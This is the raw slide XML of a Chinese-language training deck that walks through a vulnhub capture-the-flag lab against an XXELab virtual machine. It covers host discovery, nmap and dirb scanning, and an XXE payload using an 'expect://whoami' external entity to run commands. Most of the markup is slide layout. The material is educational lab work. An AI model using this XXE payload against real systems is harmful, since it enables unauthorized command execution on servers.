                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "expect://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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642522" y="2626360"/>
            <a:ext cx="2011680" cy="2011680"/>
            <a:chOff x="2611664" y="2548865"/>
            <a:chExt cx="2011680" cy="2011680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2611664" y="2548865"/>
              <a:ext cx="2011680" cy="2011680"/>
              <a:chOff x="1805940" y="1198245"/>
              <a:chExt cx="2011680" cy="2011680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="圆角矩形 1"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1805940" y="1198245"/>
                <a:ext cx="2011680" cy="2011680"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19981"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="596E69"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="254000" dist="1270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圆角矩形 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1971639" y="1363944"/>
                <a:ext cx="1680278" cy="1680278"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19112"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="E0E0E0"/>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="101600">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="177800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="6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4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3081701" y="3076402"/>
              <a:ext cx="1071601" cy="994705"/>
              <a:chOff x="3503864" y="2079606"/>
              <a:chExt cx="1071601" cy="994705"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="文本框 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3503864" y="2427980"/>
                <a:ext cx="107160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rPr>
                  <a:t>03</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="文本框 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597472" y="2079606"/>
                <a:ext cx="884387"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rPr>
                  <a:t>PRAT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126230" y="3217545"/>
            <a:ext cx="6635115" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>vulnhub虚拟机靶场实战</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1718310" y="1628140"/>
            <a:ext cx="8722360" cy="3599815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vulnhub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实战实验简介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Vulnhub是一个提供各种漏洞环境的靶场平台，供安全爱好者学习渗透使用。其大部分环境是做好的虚拟机镜像文件，需要使用VMware或VirtualBox运行。网址：https://www.vulnhub.com。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>本次实验目的：通过信息收集获取靶机XXE网站地址，利用协议进行XXE漏洞利用，获取靶机flag。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>本次实验环境：靶机为XXELab、ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，攻击机为kaliLinux 、ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=192.168.235.143</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9361805" cy="1137285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>ifconfig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="26288"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019935" y="2439670"/>
            <a:ext cx="7610475" cy="3335020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2696845" y="3017520"/>
            <a:ext cx="1724660" cy="202565"/>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9361805" cy="1137285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>使用netdiscover扫描本地网络主机：netdiscover -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>192.168.235</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1395413" y="2594928"/>
            <a:ext cx="8715375" cy="2447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536700" y="4326255"/>
            <a:ext cx="5041265" cy="16256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9361805" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>3.使用nmap扫描:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>nmap -sV -p 1-65535 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>92.168.235.144 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>-v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>可以看到机器开放了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>5355</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1339850" y="2177415"/>
            <a:ext cx="8388985" cy="4600575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1339850" y="5533390"/>
            <a:ext cx="3662045" cy="61976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9361805" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>浏览器访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>机器的80端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000"/>
              <a:t>出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>界面</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="图片 102"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410335" y="1928495"/>
            <a:ext cx="8186420" cy="47809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753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t> 使用dirb扫描1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>92.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000"/>
              <a:t>看是否有隐藏目录：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>http://1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>92.168.235.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>敏感文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>robots.txt，此文件包含了互联网上的网页信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652270" y="2831465"/>
            <a:ext cx="4925695" cy="3924300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797050" y="5654675"/>
            <a:ext cx="4319270" cy="19685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691640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、基本信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>  浏览器访问http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>/robots.txt，查看robots.txt文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>,发现存在后台管</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>理页面和xxe网站</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716405" y="2872105"/>
            <a:ext cx="8123555" cy="3256915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797050" y="5133975"/>
            <a:ext cx="1744345" cy="41656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altLang="zh-CN" sz="2000"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t> 访问http://1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>92.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>/xxe/（admin.php 404了）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="18452"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552575" y="2345690"/>
            <a:ext cx="9632950" cy="42221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717577" y="2626360"/>
            <a:ext cx="2011680" cy="2011680"/>
            <a:chOff x="2611664" y="2548865"/>
            <a:chExt cx="2011680" cy="2011680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2611664" y="2548865"/>
              <a:ext cx="2011680" cy="2011680"/>
              <a:chOff x="1805940" y="1198245"/>
              <a:chExt cx="2011680" cy="2011680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="圆角矩形 1"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1805940" y="1198245"/>
                <a:ext cx="2011680" cy="2011680"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19981"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="596E69"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="254000" dist="1270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圆角矩形 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1971639" y="1363944"/>
                <a:ext cx="1680278" cy="1680278"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
